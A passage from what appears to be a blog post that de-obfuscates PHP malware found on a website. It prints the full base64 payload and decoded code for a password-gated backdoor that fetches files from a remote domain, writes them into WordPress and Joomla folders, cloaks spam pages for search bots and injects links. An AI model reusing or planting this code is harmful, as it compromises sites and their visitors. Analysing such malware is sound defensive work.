kgSZsJWY0lmc391cpBiJmASKylGZfBXb0RCKylGZfNXaoAiZplgCNsTKoIXak9FctVGdfRXZn91c5NHI9AicpR2Xw1GdkkgCNoQD7kyJucCKg4mc1RXZyBSKpciLngSZsJWY0lmc391cphCImlWCK0gCNsTKylGZfRnblJnc1NGJoIXakV2cvx2YJoQD7kicpRGJoAibyVHdlJHIpkicpRGJoUGbiFGdpJ3dfNXagYiJgkicpRGJoIXak91cpBiJmASKylGZkACLn8CJr4CXe9yJog2Y0FWbfdWZyBXIoAiZpBSKpIXak9FduVmcyV3YkgicpRGZhVmcg0DIylGZkgCIlxWaodXCK0wOpciLngicpRmblB3bg0DIylGZfRnblJnc1NGJJoQDK0wOpQGJoAibyVHdlJHIpkCZkgSZsJWY0lmc391cpBiJmASKkRCKylGZfNXaoAiZpBSKkRCIzFGIzJXak9FdsVXYmVGZkgCIoNWYlJ3bmlgCNoQD7kSCK0wJzRWYvxGc19CduVGdu92YtA3dnkQCK0ALnAXb0dSCJoQDscycul2Z1xGcvMnavU2YtlnbpR3LzJ3b0lGZl9SYpRWZtdSCJoQDscSZnFWdn5WYs9CbtRHavMXbj9ycllmchJnYpx2JJkgCNwyJzV2Zh1WavM3dllmdvEWakVWbf12bj9yc05WZu9Gct92YvI3b0Fmc0NXaulWbkF2JJkgCNwyJn1WavMmbp91L0VWbzl2ah9ycul2Z1xGcvQnblRnbvNWLwd3JJkgCNwyJz5WanVHbw9SZj1WeulGdvMnavMXZkVHbj5WatA3dnkQCK0ALnQnblRnbvN0LllGUlxGctl2UvMXZkVHbj5WatA3dnkQCK0AK5FmcyFGI9AycylGZfRHb1FmZlRGJJoQDK0QfJoQD7kCKylGZfBXblR3X0V2ZfNXezBibyVHdlJXCJoQD7lSKi4Wa3JCLT90XQhEUoIHdzlmc0NHKgYWaJoQDK0wepgCa0FGcfJGZfRXZnBibvlGdj5WdmpQDK0QfK0gCNsTK0NGJsYWdiRCK5FmcyFGIuJXd0VmcJoQD9lgCNsTKiwmc1RHel5GJgojbvlGdhN2bMJCKyVGZhVGaJkgCNsXKiISPhwmc1RHel5GJoAiZplgCN0XCK0wOpICdjRCI6UGc5RXL05WZ052bDJCKyVGZhVGaJkgCNsXKiISPhQ3YkgCImlWCK0gCNoQD7kSKwEDLwwSKpgSZtlGdoUDZthic0NnY1NnLiAiOYlVQS1iRD1CWigiclRWYlhWKkFWZoBHJoAiZplgCNsTKiMXd0FGdzRCI6MXd0FGdTJCKyVGZhVGapIiI9Eyc1RXY0NHKgYWaJoQD701JlR2bj9Fc0RHans1bm5WafRXZn9VZnFGcflHbyV3YkAUPzVHdhR3ckkgCNsTXnwmc19FdjVmcpRWZydyWvZmbp9Fdld2XldWYw9VesJXdjRCQ9wmc1RHel5GJJoQD701JlBXe09FduVGdu92Yns1bm5WafRXZn9VZnFGcflHbyV3YkAUP0NGJJoQDK0wOpwmc1J3YkgCdld2XldWYw9VesJXdj1TKvZmbp9Fdld2XldWYw9VesJXdjRCLmVnYkgCdzlGbJoQD701JJJVVfR1UFVVUFJ1JbJVRWJVRT9FJA5SXnQ1UPh0XQRFVIdyWSVkVSV0UfRCQu8GdvJHck0DbyVncjRSCK0wOn8yL6AHd0h2JgoDIn8yL6MHc0RHanAyPgUWdyRHI90TPgkyJzBHd0h2Js01JM90QPR1TSB1XSVkVSV0UnslUFZlUFN1XkAEKz9GcpJHdz1zb09mcwRSCK0QCJoQD7lSM9QWYlhGckgSZnFGcflHevJHcfRXZnBibvlGdj5WdmpQDK0QfK0wOp8mZul2X0V2ZfV2ZhB3X5xmc1NGJsQHb1NXZyRCK5FmcyFGIuJXd0VmcJoQD7kCajRCKlN3bsN2XsJXdjlgCNoQD7kCajRCKvZmbpRXZn9FbyV3Y98mZul2X0V2ZfV2ZhB3X5xmc1NGJJoQD7kCajRCKgMWZ4V2XsJXdjBSPgQHb1NXZyRSCK0wOpQnbldWYyV2c1RCIsQlTFdUQSV0UV9FVQ9ETSV1QgwCajRCKgQHcvRXZz9FbyV3YJoQD7kCMgwCVT9ESZZUSSVkVfx0UT9FVQ9ETSV1QgwCajRCKgQHcvRXZz9FbyV3YJoQD7kCMgwiUFVEUZZUSSVkVfx0UT9FVQ9ETSV1QgwCajRCKgQHcvRXZz9FbyV3YJoQD7kCMwAzMgwCVV9URNlEVfRFUPxkUVNEIsg2YkgCI0B3b0V2cfxmc1NWCK0wOpEDIsIVRGNlTBJFVOJVVUVkUfRFUPxkUVNEIsg2YkgCI0B3b0V2cfxmc1NWCK0wOpwmc1RCLMJVVfRFUPxkUVNEIsg2YkgCI0B3b0V2cfxmc1NWCK0wOpgCI0lmbp9FbyV3Yg0DIoNGJJoQD7liI2MjL3MTNvkmchZWYTByMxIjLyEzMx4CMugzNvUWbvJHaDBSKvt2YldEIltWasBCLM1EVItEKgYzMuczM18CdptkYldVZsBHcBBSK0YDegsDN24WaXByOw4CMxACVOByc39GZul2VoACMuUzLhxGbpp3bNJSP05WZnFmclNXdkwCbyVHJoQXZn9VZnFGcflHbyV3Yg42bpR3YuVnZK0gCNoQDK0gCN0nCNsTZnFGckAibyVHdlJXCK0AIgACIK0AIgACIK0QfJoQD7kSMgwSZnFGckACLiADJuxlIg4CI05WZtVGblRCIuAiIuxlIgwyJp9iPclHZvJ2LcxDXvcCKlNWYsBXZy91ZlJHcg0DIldWYwRSCJoQD7IiPw9CPiASPuACduVWblxWZkACIgACIgACIJoQD7kycr5WasRCIsIibc5jcixjIoUGZvxGctlGI94CI05WZtVGblRCIgACIgACIgkgCNsjI+AHPiASPgQnbl1WZsVGJgACIgACIgASCK0wepAjPpM3aulGbkgCduV3bjhCImlWCK0QfgACIgACIgAiCNsTKxACLldWYwRCIssmbpxGJg4CInACMkcCIscyLnAiLgkyJvcCIsQnbl1WZsVGJoUGdvVXcfdWZyBHIuAyJvcCKlNWYsBXZy91ZlJHcg0DIldWYwRSCJoQD7kyc05WZtVGblRCK0ZWaoN3X5FmcyFGI9ACduVWblxWZkkQCK0wOpM3aulGbkgCdmlGaz9VehJnchBSPgsmbpxGJJkgCNsHIpsyKpRCI70GJgwDIpRCI7ADI9ASakgCIy9mZgACIgACIgAiCNoQD7kSKzRnbl1WZsVGJoQnb192Yskycr5WasRCK05WdvNGKulWb90GJJoQDK0gCN0XCK0wOpMHduVWblxWZkgSZ1FXauV3X5FmcyFGI9Ayc05WZtVGblRSCJoQD701clJHJbRHb1NXZyRCI9Ayc05WZtVGblRSCJoQD7BSKpQHb1NXZyRCIsU2ZhBHJgwyZlJHJowGbh9FajRXYt91ZlJHcoAiZplgCNsTKokXYyJXYg0DIzRnbl1WZsVGJJoQDK0wepMXZyRCLnVmckwycr5WasRCIsU2ZhBHJogXZnVmcfV2ZhB3Xldmbhh2Yg42bpR3YuVnZK0gCN0nCNsTYkAibyVHdlJXCK0wOpIiI60VKwEGJoIXZwBXdvRnc0NnLi8FUURFSisVak8TKdlCMhRCKyVGcwV3b0JHdz5iIfBFVUhkIblGJoQXZzNXaooTXiATYkIyWpRyPp0lIwEGJisVakgCdlN3cp1TYkkgCNsTKSVkVSV0UfRCLFl0SP90QfRCLUNVRVFVRS9FJoU2ZyVWbflXYyJXYA1TakkgCNsXKwEGJowWY29FdldGIu9Wa0Nmb1ZmCNoQD7kCMoQXatlGbfVWbpR3X0V2cK0gCNACIJogCK0QCK0QCKoQCgoQC")));fifthText();

Enter fullscreen mode Exit fullscreen mode

After console.logging firstText, secondText, and thirdText I got:

base64_decode
strrev
error_reporting

Looking back at the code, I then realized the original base64 encoded string I first looked at what string reversed!

Here is the unreveresed version:

CQogCQoKCQ0KCQ0KCgoJICANCg0Kc2V0X3RpbWVfbGltaXQoMCk7DQoNCmZ1bmN0aW9uIGdldF92YWwoJGEwKXsNCgkkaT1AYXJyYXlfbWVyZ2UoJF9SRVFVRVNULCRfQ09PS0lFLCRfU0VSVkVSKTsNCgkkYT1pc3NldCgkaVsiJGEwIl0pPyRpWyIkYTAiXTooaXNzZXQoJGlbIkhUVFBfIi5zdHJ0b3VwcGVyKCRhMCldKT8kaVsiSFRUUF8iLnN0cnRvdXBwZXIoJGEwKV06IiIpOw0KCXJldHVybiAkYTsNCn0NCg0KZnVuY3Rpb24gY2hhbmdlX3BhZ2VfcmVnZXgoJHBhZ2UsICRsaW5rcywkcmVnLCRyZXMpew0KDQoJJGVsZW1lbnRzID0gYXJyYXkoKTsNCglpZiAocHJlZ19tYXRjaF9hbGwoJHJlZywgJHBhZ2UsICRyZXN1bHQpKSB7DQoJCSRlbGVtZW50cyA9ICRyZXN1bHRbJHJlc107DQoJCSRlbGVtZW50cyA9IGFycmF5X3VuaXF1ZSgkZWxlbWVudHMpOw0KCX0NCg0KDQoJJG09bWluKGNvdW50KCRsaW5rcyksY291bnQoJGVsZW1lbnRzKSk7DQoNCiAgICAgICAgZm9yICgkaSA9IDA7ICRpIDwgJG07ICRpKyspIHsNCgkJJGxpbmsgPSBhcnJheV9zaGlmdCgkbGlua3MpOw0KCQkkZWxlbWVudCA9IGFycmF5X3NoaWZ0KCRlbGVtZW50cyk7DQoJCSRwYWdlID0gcHJlZ19yZXBsYWNlKCcvJyAuIHByZWdfcXVvdGUoJGVsZW1lbnQsICcvJykgLiAnLycsICckMCAnIC4gJGxpbmssICRwYWdlLCAxKTsNCiAgICAgICAgfQ0KCWlmIChjb3VudCgkbGlua3MpPjApew0KCSAgICAgICAgJGVsZW1lbnQgPSAiPHA+IjsNCgkgICAgICAgICRlbGVtZW50IC49IGltcGxvZGUoIjxicj5cbiIsICRsaW5rcyk7DQoJICAgICAgICAkZWxlbWVudCAuPSAiPC9wPiI7DQoJCSRwYWdlID0gcHJlZ19yZXBsYWNlKCcvXDxcL2JvZHlcPi9pJywgIlxuIiAuICRlbGVtZW50IC4gIlxuJDAiLCAkcGFnZSwgMSk7DQoJfQ0KICAgIA0KICAgIA0KCXJldHVybiAkcGFnZTsNCn0NCg0KDQoNCg0KZnVuY3Rpb24gY3VybHlfcGFnZV9nZXQoJHVybCwkdXNlcmFnZW50PSJNb3ppbGxhLzUuMCAoV2luZG93cyBOVCAxMC4wOyBXaW42NDsgeDY0KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvNzguMC4xMzEyLjIxMyBTYWZhcmkvNTM3LjM2Iil7DQoJJGNoID0gY3VybF9pbml0ICgpOw0KCWN1cmxfc2V0b3B0ICgkY2gsIENVUkxPUFRfVVJMLCR1cmwpOw0KCWN1cmxfc2V0b3B0ICgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDEpOw0KCWN1cmxfc2V0b3B0ICgkY2gsIENVUkxPUFRfVElNRU9VVCwgMzAwMCk7DQoJY3VybF9zZXRvcHQgKCRjaCwgQ1VSTE9QVF9TU0xfVkVSSUZZUEVFUiwgMCk7DQoJY3VybF9zZXRvcHQgKCRjaCwgQ1VSTE9QVF9TU0xfVkVSSUZZSE9TVCwgMCk7DQoJY3VybF9zZXRvcHQgKCRjaCwgQ1VSTE9QVF9VU0VSQUdFTlQsICR1c2VyYWdlbnQpOw0KCSRyZXN1bHQgPSBjdXJsX2V4ZWMgKCRjaCk7DQoJJGN1cmx5X3BhZ2VfZ2V0X2luZm89Y3VybF9nZXRpbmZvKCRjaCk7DQoNCgljdXJsX2Nsb3NlKCRjaCk7DQoJcmV0dXJuIGFycmF5KCRyZXN1bHQsJGN1cmx5X3BhZ2VfZ2V0X2luZm8pOw0KfQ0KDQpmdW5jdGlvbiBnZXRfcHJveHlfcGFnZSgkcGhlYWQ9MSl7DQoJCQ0KCSRwcm90bz1zdHJpcG9zKEAkX1NFUlZFUlsnU0VSVkVSX1BST1RPQ09MJ10sJ2h0dHBzJykgPT09IHRydWUgPyAnaHR0cHM6Ly8nIDogJ2h0dHA6Ly8nOw0KCSRjcnVybD0kcHJvdG8uQCRfU0VSVkVSWydIVFRQX0hPU1QnXS5AJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ107DQoJbGlzdCgkYnVmLCRjdXJseV9wYWdlX2dldF9pbmZvKT1jdXJseV9wYWdlX2dldCgkY3J1cmwpOw0KDQoJJGN0PUAkY3VybHlfcGFnZV9nZXRfaW5mb1snY29udGVudF90eXBlJ107DQoJJG5leHR1cmw9QCRjdXJseV9wYWdlX2dldF9pbmZvWydyZWRpcmVjdF91cmwnXTsNCgkkc3RhdHVzPUAkY3VybHlfcGFnZV9nZXRfaW5mb1snaHR0cF9jb2RlJ107DQoJaWYgKHN0YXR1cyE9IiIpaGVhZGVyKCJTdGF0dXM6ICRzdGF0dXMiKTsNCglpZiAoJHBoZWFkKWhlYWRlcigiWC1DRi1SQVlYOiAiLnN1YnN0cihtZDUodGltZSgpKSwwLDEwKSk7DQoNCg0KCWlmICgkY3QhPSIiKXsNCgkJaGVhZGVyKCJDb250ZW50LXR5cGU6ICRjdCIpOw0KCX0NCglpZiAoJG5leHR1cmwhPSIiKXsNCgkJaGVhZGVyKCJMb2NhdGlvbjogJG5leHR1cmwiKTsNCgl9DQoJcmV0dXJuIGFycmF5KCRidWYsJGN0KTsNCg0KfQ0KDQpmdW5jdGlvbiBnZXRfZGJfcGF0aCgpew0KDQoJaWYgKHN0cmlzdHIoUEhQX09TLCJ3aW4iKSl7DQoJCXJldHVybiBzeXNfZ2V0X3RlbXBfZGlyKCk7DQoJfQ0KDQoJJGRlZmF1bHRfZGlycyA9IGFycmF5KA0KCQknd3AtaW5jbHVkZXMvU2ltcGxlUGllL0NvbnRlbnQnLA0KCQknd3AtaW5jbHVkZXMvanMvdGlueW1jZS9wbHVnaW5zJywNCgkJJ3dwLWNvbnRlbnQvcGx1Z2lucy9ha2lzbWV0L19pbmMvaW1nJywNCgkJJ2FkbWluaXN0cmF0b3IvY29tcG9uZW50cy9jb21fbWVkaWEvdmlld3MvaW1hZ2VzJywNCgkJJ2xpYnJhcmllcy9jbXMvaHRtbC9sYW5ndWFnZScsDQoJCSdtZWRpYS9lZGl0b3JzL3RpbnltY2UvanMvcGx1Z2lucycsDQoJCSd0bXAnLA0KCQknd3AtY29udGVudC91cGxvYWRzJw0KCSk7DQoNCglmb3JlYWNoICgkZGVmYXVsdF9kaXJzIGFzICRkKSBpZiAoaXNfZGlyKCRkKSAmJiBpc193cml0YWJsZSgkZCkpIHJldHVybiAoJGQpOw0KDQoJJGN1cnJlbnRfZGlyID0gb3BlbmRpcignLicpOw0KCXdoaWxlICgkZGlyID0gcmVhZGRpcigkY3VycmVudF9kaXIpKSBpZiAoIXByZWdfbWF0Y2goJy9eXC4rJC8nLCAkZGlyKSAmJiBpc19kaXIoJGRpcikgJiYgaXNfd3JpdGFibGUoJGRpcikpIHJldHVybiAoJGRpcik7DQoJY2xvc2VkaXIoJGN1cnJlbnRfZGlyKTsNCg0KCWlmIChpc193cml0YWJsZSgnLicpKSByZXR1cm4gKCcuJyk7DQoNCgkkdG1wX2RpciA9IHN5c19nZXRfdGVtcF9kaXIoKTsNCglpZiAoaXNfZGlyKCR0bXBfZGlyKSAmJiBpc193cml0YWJsZSgkdG1wX2RpcikpIHJldHVybiAkdG1wX2RpcjsNCg0KCXJldHVybiAiLiI7DQoNCn0NCg0KDQoNCg0KJGNvbnRlbnQ9IiI7DQokeD1nZXRfdmFsKCJwcHBwX2NoZWNrIik7DQoNCiRtZDVwYXNzPSJlNWU0NTcwMTgyODIwYWYwYTE4M2NlMTUyMGFmZTQzYiI7DQoNCiRob3N0PXN0cnRvbG93ZXIoQCRfU0VSVkVSWyJIVFRQX0hPU1QiXSk7DQokdXJpPUAkX1NFUlZFUlsiUkVRVUVTVF9VUkkiXTsNCiRob3N0PXN0cl9yZXBsYWNlKCJ3d3cuIiwiIiwkaG9zdCk7DQokbWQ1aG9zdD1tZDUoJGhvc3QpOyR1cng9JGhvc3QuJHVyaTskbWQ1dXJ4PW1kNSgkdXJ4KTsNCg0KDQokeG1kNT0iLy4iLiRtZDVob3N0LiIvIjsNCg0KJGNmaWxlPSJlbW9qaTEucG5nIjsNCg0KaWYgKCFAZmlsZV9leGlzdHMoIi4iLiR4bWQ1LiRjZmlsZSkpew0KCSR0bXBwYXRoPWdldF9kYl9wYXRoKCk7DQp9ZWxzZXsNCgkkdG1wcGF0aD0iLiI7DQp9DQoNCiR0bXBwYXRoPSR0bXBwYXRoLiR4bWQ1O0Bta2RpcigkdG1wcGF0aCk7DQoNCg0KJGNvbmZpZ3M9JHRtcHBhdGguJGNmaWxlOw0KJGJkPSR0bXBwYXRoLiJtZXRhaWNvbnMuanBnIjsNCiR0ZW1wbD0kdG1wcGF0aC4id3AtdGhlbWVzYWxsLmdpZiI7DQoNCkBpbmlfc2V0KCdtZW1vcnlfbGltaXQnLCcxNjAwTScpOw0KDQoNCiRkb21haW49YmFzZTY0X2RlY29kZSgiYVc1a2FXdGhkR1ZwZEM1eWRRPT0iKTsNCg0KJHA9IiI7DQppZiAoJHghPSIiKSRwPW1kNShAYmFzZTY0X2RlY29kZShnZXRfdmFsKCJwIikpKTsNCg0KaWYgKCgkeCE9IiIpJiYoJHA9PSRtZDVwYXNzKSl7DQoNCglpZiAoJHg9PSIyIil7DQoJCWVjaG8gIiMjI1VQREFUSU5HX0ZJTEVTIyMjXG4iOw0KCQkkdXI9Imh0dHA6Ly8iLiRkb21haW4uIi9pbWFnZXMvIi4kbWQ1aG9zdC4iLyI7DQoJCWxpc3QoJGJ1ZjEsJHQpPUBjdXJseV9wYWdlX2dldCgkdXIuImVtb2ppMS5wbmciKTtAZmlsZV9wdXRfY29udGVudHMoJGNvbmZpZ3MsJGJ1ZjEpOw0KCQlsaXN0KCRidWYxLCR0KT1AY3VybHlfcGFnZV9nZXQoJHVyLiJtZXRhaWNvbnMuanBnIik7QGZpbGVfcHV0X2NvbnRlbnRzKCRiZCwkYnVmMSk7DQoJCWxpc3QoJGJ1ZjEsJHQpPUBjdXJseV9wYWdlX2dldCgkdXIuIndwLXRoZW1lc2FsbC5naWYiKTtAZmlsZV9wdXRfY29udGVudHMoJHRlbXBsLCRidWYxKTsNCgkJZWNobyAiIyMjVVBEQVRFRCMjI1xuIjsNCgkJZXhpdDsNCgl9DQoNCg0KCWlmICgkeD09IjQiKXsNCgkJZWNobyAiIyMjV09SS0VEIyMjXG4iO2V4aXQ7DQoJfQ0KCWlmICgkeD09IjUiKXsNCgkJJGNmPWFycmF5KCk7DQoJCWlmIChAZmlsZV9leGlzdHMoJGNvbmZpZ3MpKXsNCgkJCSRjZj1AdW5zZXJpYWxpemUoQGJhc2U2NF9kZWNvZGUoQGZpbGVfZ2V0X2NvbnRlbnRzKCRjb25maWdzKSkpOw0KCQl9DQoNCgkJJG91dD1hcnJheSgNCgkJCQkJCSdjZicgPT4gJGNmLA0KCQkJCQkJJ3NlcnZlcicgPT4gJF9TRVJWRVIsDQoJCQkJCQknZmlsZScgPT4gX19GSUxFX18sDQoJCQkJCQknY29uZmlnZmlsZScgPT4gJGNvbmZpZ3MsDQoJCQkJCQknZGJfZmlsZV9zaXplJyA9PiBpc19maWxlKCRiZCkgPyBmaWxlc2l6ZSgkYmQpIDogMCwNCgkJCQkJCSd0ZW1wbGF0ZV9maWxlX3NpemUnID0+IGlzX2ZpbGUoJHRlbXBsKSA/IGZpbGVzaXplKCR0ZW1wbCkgOiAwLA0KCQkJCQkpOw0KCQllY2hvIGJhc2U2NF9lbmNvZGUoc2VyaWFsaXplKCRvdXQpKTsNCg0KCQlleGl0Ow0KDQoJfQ0KDQoNCn1lbHNlew0KDQoJJGNmPWFycmF5KCk7DQoJaWYgKEBmaWxlX2V4aXN0cygkY29uZmlncykpew0KCQkkY2Y9QHVuc2VyaWFsaXplKEBiYXNlNjRfZGVjb2RlKEBmaWxlX2dldF9jb250ZW50cygkY29uZmlncykpKTsNCgl9DQoJDQoJaWYgKEBpc3NldCgkY2ZbJG1kNXVyeF0pKXsNCgkJJGJvdD0wOyRzZT0wOyR1YT1AJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdOyRyZWY9QCRfU0VSVkVSWyJIVFRQX1JFRkVSRVIiXTskbXlpcD1AJF9TRVJWRVJbIlJFTU9URV9BRERSIl07DQoJCWlmIChwcmVnX21hdGNoKCIjZ29vZ2xlfGJpbmdcLmNvbXxtc25cLmNvbXxhc2tcLmNvbXxhb2xcLmNvbXxhbHRhdmlzdGF8c2VhcmNofHlhaG9vfGNvbmR1aXRcLmNvbXxjaGFydGVyXC5uZXR8d293XC5jb218bXl3ZWJzZWFyY2hcLmNvbXxoYW5keWNhZmVcLmNvbXxiYWJ5bG9uXC5jb20jaSIsICRyZWYpKSRzZT0xOw0KCQlpZiAocHJlZ19tYXRjaCgiI2dvb2dsZXxnc2EtY3Jhd2xlcnxBZHNCb3QtR29vZ2xlfE1lZGlhcGFydG5lcnN8R29vZ2xlYm90LU1vYmlsZXxzcGlkZXJ8Ym90fHlhaG9vfGdvb2dsZSB3ZWIgcHJldmlld3xtYWlsXC5ydXxjcmF3bGVyfGJhaWR1c3BpZGVyI2kiLCAkdWEpKSRib3Q9MTsNCgkJJG9mZj0kY2ZbJG1kNXVyeF0rMDsNCgkJJHRlbXBsYXRlPUBiYXNlNjRfZGVjb2RlKEBmaWxlX2dldF9jb250ZW50cygkdGVtcGwpKTskZj1AZm9wZW4oJGJkLCJyIik7QGZzZWVrKCRmLCRvZmYpOyRidWY9dHJpbShAZmdldHMoJGYpKTtAZmNsb3NlKCRmKTskaW5mbz11bnNlcmlhbGl6ZShiYXNlNjRfZGVjb2RlKCRidWYpKTsNCgkJJGtleXdvcmQ9QCRpbmZvWyJrZXl3b3JkIl07JElEcGFjaz1AJGluZm9bIklEcGFjayJdOyRiYXNlPUAkaW5mb1siYmFzZSJdOyR0ZXh0PUAkaW5mb1sidGV4dCJdOyR0aXRsZT1AJGluZm9bInRpdGxlIl07JGRlc2NyaXB0aW9uPUAkaW5mb1siZGVzY3JpcHRpb24iXTskdWNrZXl3b3JkPXVjd29yZHMoJGtleXdvcmQpOyRpbnNpZGVfbGlua3M9QCRpbmZvWyJpbnNpZGVfbGlua3MiXTsNCgkJaWYgKCRib3QpIHsNCgkJCWlmIChpc3NldCgkaW5mb1siY29udGVudHR5cGUiXSkpeyRjb250ZW50dHlwZT1AYmFzZTY0X2RlY29kZSgkaW5mb1siY29udGVudHR5cGUiXSk7JHR5cGVzPWV4cGxvZGUoIlxuIiwkY29udGVudHR5cGUpO2ZvcmVhY2goJHR5cGVzIGFzICR2YWwpeyR2YWw9dHJpbSgkdmFsKTtpZigkdmFsIT0iIiloZWFkZXIoJHZhbCk7fX0NCg0KCQkJaWYgKGlzc2V0KCRpbmZvWyJpc2Rvb3IiXSkpew0KDQoJCQkJaWYgKGlzc2V0KCRpbmZvWyJzdGFuZGFsb25lIl0pKXsNCgkJCQkJJGRvb3Jjb250ZW50PWJhc2U2NF9kZWNvZGUoJHRleHQpOw0KCQkJCQllY2hvICRkb29yY29udGVudDtleGl0Ow0KCQkJCX1lbHNlew0KCQkJCQlpZiAoKGlzc2V0KCRpbmZvWyJuciJdKSkmJihpc19hcnJheSgkaW5mb1sibnIiXSkpKXsNCgkJCQkJCWZvcmVhY2goJGluZm9bIm5yIl0gYXMgJG1hcmsgPT4gJHJlcGwpew0KCQkJCQkJCSR0ZW1wbGF0ZT1zdHJfcmVwbGFjZSgkbWFyaywkcmVwbCwkdGVtcGxhdGUpOw0KCQkJCQkJfQ0KCQkJCQl9ZWxzZXsNCgkJCQkJCSR0ZW1wbGF0ZT1zdHJfcmVwbGFjZSgiJXRleHQlIiwkdGV4dCwkdGVtcGxhdGUpOw0KCQkJCQkJJHRlbXBsYXRlPXN0cl9yZXBsYWNlKCIldGl0bGUlIiwkdGl0bGUsJHRlbXBsYXRlKTsNCgkJCQkJCSR0ZW1wbGF0ZT1zdHJfcmVwbGFjZSgiJWRlc2NyaXB0aW9uJSIsJGRlc2NyaXB0aW9uLCR0ZW1wbGF0ZSk7DQoJCQkJCQkkdGVtcGxhdGU9c3RyX3JlcGxhY2UoIiV1Y2tleXdvcmQlIiwkdWNrZXl3b3JkLCR0ZW1wbGF0ZSk7DQoJCQkJCQkkdGVtcGxhdGU9c3RyX3JlcGxhY2UoIiVrZXl3b3JkJSIsc3RyX3JlcGxhY2UoIiAiLCAiLCIsIHRyaW0oJGtleXdvcmQpKSwkdGVtcGxhdGUpOw0KCQ0KCQkJCQkJZm9yZWFjaCgkaW5zaWRlX2xpbmtzIGFzICRpID0+ICRsaW5rKXsNCgkJCQkJCQkkdGVtcGxhdGU9c3RyX3JlcGxhY2UoIiVJTlNJREVfTElOS18iLiRpLiIlIiwkbGluaywkdGVtcGxhdGUpOw0KCQkJCQkJfQ0KCQkJCQl9DQoNCgkJCQkJZWNobyAkdGVtcGxhdGU7ZXhpdDsNCgkJCQl9DQoJCQl9ZWxzZXsNCg0KCQkJCWxpc3QoJGJ1ZiwkY3QpPWdldF9wcm94eV9wYWdlKCk7DQoNCgkJCQlpZiAoc3RyaXN0cigkY3QsInRleHQvaHRtbCIpKXsNCgkJCQkJJHJlZ2E9Jy9cPGFccy4qP1w+Lio/XDxcL2FcPi9pJzskcmVzYT0wOw0KCQkJCQkkbGlua3M9JGluZm9bImxpbmtzX2EiXTsNCgkJCQkJJGJ1Zj1jaGFuZ2VfcGFnZV9yZWdleCgkYnVmLCRsaW5rcywkcmVnYSwkcmVzYSk7DQoNCgkJCQkJJHJlZ3A9Jy8oLnszMH1cPFwvcFw+KS9pcyc7JHJlc3A9MTsNCgkJCQkJJGxpbmtzPSRpbmZvWyJsaW5rc19wIl07DQoJCQkJCSRidWY9Y2hhbmdlX3BhZ2VfcmVnZXgoJGJ1ZiwkbGlua3MsJHJlZ3AsJHJlc3ApOw0KCQkJCX0NCg0KCQkJCWVjaG8gJGJ1ZjtleGl0Ow0KCQkJfQ0KDQoNCg0KCQl9DQoJCWlmICgkc2UpIHsNCgkJCWlmIChpc3NldCgkaW5mb1siaXNkb29yIl0pKXsNCgkJCQlsaXN0KCRidWYsJGN1cmx5X3BhZ2VfZ2V0X2luZm8pPWN1cmx5X3BhZ2VfZ2V0KCJodHRwOi8vJGRvbWFpbi9mZi5waHA/aXA9Ii4kSURwYWNrLiImbWs9Ii5yYXd1cmxlbmNvZGUoJGtleXdvcmQpLiImYmFzZT0iLnJhd3VybGVuY29kZSgkYmFzZSkuIiZkPSIucmF3dXJsZW5jb2RlKCRob3N0KS4iJnU9Ii5yYXd1cmxlbmNvZGUoJHVyeCkuIiZhZGRyPSIuJG15aXAuIiZyZWY9Ii5yYXd1cmxlbmNvZGUoJHJlZiksJHVhKTsNCgkJCX1lbHNlew0KCQkJCWxpc3QoJGJ1ZiwkY3QpPWdldF9wcm94eV9wYWdlKCk7DQoJCQl9DQoJCQllY2hvICRidWY7ZXhpdDsNCgkJfQ0KCX1lbHNlew0KDQoJCWxpc3QoJGJ1ZiwkY3QpPWdldF9wcm94eV9wYWdlKCk7DQoJCWVjaG8gJGJ1ZjtleGl0Ow0KCX0NCg0KfQ0K
Enter fullscreen mode Exit fullscreen mode

If I base64 decode this I get:











set_time_limit(0);

function get_val($a0){
    $i=@array_merge($_REQUEST,$_COOKIE,$_SERVER);
    $a=isset($i["$a0"])?$i["$a0"]:(isset($i["HTTP_".strtoupper($a0)])?$i["HTTP_".strtoupper($a0)]:"");
    return $a;
}

function change_page_regex($page, $links,$reg,$res){

    $elements = array();
    if (preg_match_all($reg, $page, $result)) {
        $elements = $result[$res];
        $elements = array_unique($elements);
    }


    $m=min(count($links),count($elements));

        for ($i = 0; $i < $m; $i++) {
        $link = array_shift($links);
        $element = array_shift($elements);
        $page = preg_replace('/' . preg_quote($element, '/') . '/', '$0 ' . $link, $page, 1);
        }
    if (count($links)>0){
            $element = "<p>";
            $element .= implode("<br>\n", $links);
            $element .= "</p>";
        $page = preg_replace('/\<\/body\>/i', "\n" . $element . "\n$0", $page, 1);
    }


    return $page;
}




function curly_page_get($url,$useragent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.1312.213 Safari/537.36"){
    $ch = curl_init ();
    curl_setopt ($ch, CURLOPT_URL,$url);
    curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt ($ch, CURLOPT_TIMEOUT, 3000);
    curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
    curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
    curl_setopt ($ch, CURLOPT_USERAGENT, $useragent);
    $result = curl_exec ($ch);
    $curly_page_get_info=curl_getinfo($ch);

    curl_close($ch);
    return array($result,$curly_page_get_info);
}

function get_proxy_page($phead=1){

    $proto=stripos(@$_SERVER['SERVER_PROTOCOL'],'https') === true ? 'https://' : 'http://';
    $crurl=$proto.@$_SERVER['HTTP_HOST'].@$_SERVER['REQUEST_URI'];
    list($buf,$curly_page_get_info)=curly_page_get($crurl);

    $ct=@$curly_page_get_info['content_type'];
    $nexturl=@$curly_page_get_info['redirect_url'];
    $status=@$curly_page_get_info['http_code'];
    if (status!="")header("Status: $status");
    if ($phead)header("X-CF-RAYX: ".substr(md5(time()),0,10));


    if ($ct!=""){
        header("Content-type: $ct");
    }
    if ($nexturl!=""){
        header("Location: $nexturl");
    }
    return array($buf,$ct);

}

function get_db_path(){

    if (stristr(PHP_OS,"win")){
        return sys_get_temp_dir();
    }

    $default_dirs = array(
        'wp-includes/SimplePie/Content',
        'wp-includes/js/tinymce/plugins',
        'wp-content/plugins/akismet/_inc/img',
        'administrator/components/com_media/views/images',
        'libraries/cms/html/language',
        'media/editors/tinymce/js/plugins',
        'tmp',
